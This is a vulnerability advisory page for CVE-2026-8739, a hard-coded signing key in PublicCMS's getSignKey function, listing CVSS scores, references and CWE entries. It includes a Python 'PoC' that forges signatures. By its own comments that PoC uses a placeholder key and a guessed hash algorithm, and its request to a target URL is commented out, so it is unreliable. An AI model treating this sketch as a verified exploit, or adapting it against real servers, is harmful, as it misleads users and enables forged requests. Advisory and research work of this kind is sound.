Security Vulnerability Report
CVE-2026-8739 CVSS 5.3 MEDIUM

Published: 2026-05-17 08:16:23
Last Modified: 2026-05-17 08:16:23

Description

A vulnerability was detected in Sanluan PublicCMS 5.202506.d. The affected element is the function getSignKey of the file publiccms-core/src/main/java/com/publiccms/logic/component/config/SafeConfigComponent.java. The manipulation of the argument privatefile_key results in use of a hard-coded cryptographic key. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Affected product (from the description): Sanluan PublicCMS 5.202506.d

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import hashlib

# PoC for CVE-2026-8739: Hard-coded Cryptographic Key in PublicCMS
# This script demonstrates the usage of the hard-coded key to forge a signature.

# The hard-coded key found in SafeConfigComponent.java
# (Assuming key for demonstration based on typical scenarios or description)
HARDCODED_KEY = "publiccms_default_key_placeholder"


def generate_signature(data, key):
    """
    Simulates the signing process using the vulnerable hard-coded key.
    """
    # Concatenate data and key
    sign_string = data + key
    # Generate hash (e.g., MD5 or SHA256 depending on implementation)
    signature = hashlib.md5(sign_string.encode('utf-8')).hexdigest()
    return signature


def exploit(target_url):
    """
    Function to send a request with a forged signature.
    """
    malicious_data = "privatefile_key=attacker_controlled_value"
    forged_sig = generate_signature(malicious_data, HARDCODED_KEY)
    print(f"[+] Target: {target_url}")
    print(f"[+] Hard-coded Key: {HARDCODED_KEY}")
    print(f"[+] Forged Signature: {forged_sig}")
    print("[!] Sending malicious request with forged signature...")
    # In a real exploit, an HTTP request would be sent here.
    # requests.get(target_url, params={'data': malicious_data, 'sign': forged_sig})


if __name__ == "__main__":
    target = "http://target-publiccms.com/api/verify"
    exploit(target)
```

References

https://vuldb.com/submit/809917
https://vuldb.com/vuln/364327
https://vuldb.com/vuln/364327/cti
https://vulnplus-note.wetolink.com/share/PCVUlOncmwTC

Raw JSON Data (key fields)

CVE ID: CVE-2026-8739
Published: 2026-05-17T08:16:23.107
Last Modified: 2026-05-17T08:16:23.107
Status: Received

CVSS 4.0 (Secondary)
Base Score: 5.5 (MEDIUM)
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: NETWORK; Attack Complexity: LOW; Attack Requirements: NONE; Privileges Required: NONE; User Interaction: NONE
Vulnerable System Impact: Confidentiality NONE, Integrity LOW, Availability NONE
Subsequent System Impact: Confidentiality NONE, Integrity NONE, Availability NONE
Exploit Maturity: PROOF_OF_CONCEPT (all environmental and supplemental metrics NOT_DEFINED)

CVSS 3.1 (Primary)
Base Score: 5.3 (MEDIUM)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: NONE; User Interaction: NONE; Scope: UNCHANGED
Impact: Confidentiality NONE, Integrity LOW, Availability NONE
Exploitability Score: 3.9; Impact Score: 1.4

CVSS 2.0 (Secondary)
Base Score: 5.0 (MEDIUM)
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N
Access Vector: NETWORK; Access Complexity: LOW; Authentication: NONE
Impact: Confidentiality NONE, Integrity PARTIAL, Availability NONE
Exploitability Score: 10.0; Impact Score: 2.9
acInsufInfo: false; obtainAllPrivilege: false; obtainUserPrivilege: false; obtainOtherPrivilege: false; userInteractionRequired: false

Weaknesses (Primary)
CWE-320 (Key Management Errors)
CWE-321 (Use of Hard-coded Cryptographic Key)